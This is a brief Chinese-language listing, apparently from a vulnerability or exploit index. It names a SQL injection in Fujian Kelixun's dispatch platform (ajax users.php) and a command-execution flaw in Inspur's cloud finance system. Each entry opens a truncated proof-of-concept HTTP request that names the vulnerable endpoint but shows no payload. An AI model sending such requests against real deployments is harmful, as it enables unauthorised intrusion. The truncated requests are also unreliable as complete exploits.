福建科立讯通信 指挥调度管理平台 ajax users.php SQL 注入漏洞
POST /app/ext/ajax users.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64
浪潮云财务系统存在命令执行
POST /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx HTTP/1.1Host:Content-Type: text/xml; charset=utf-8Content-Length: 16396SOAPAction: “http://tempu...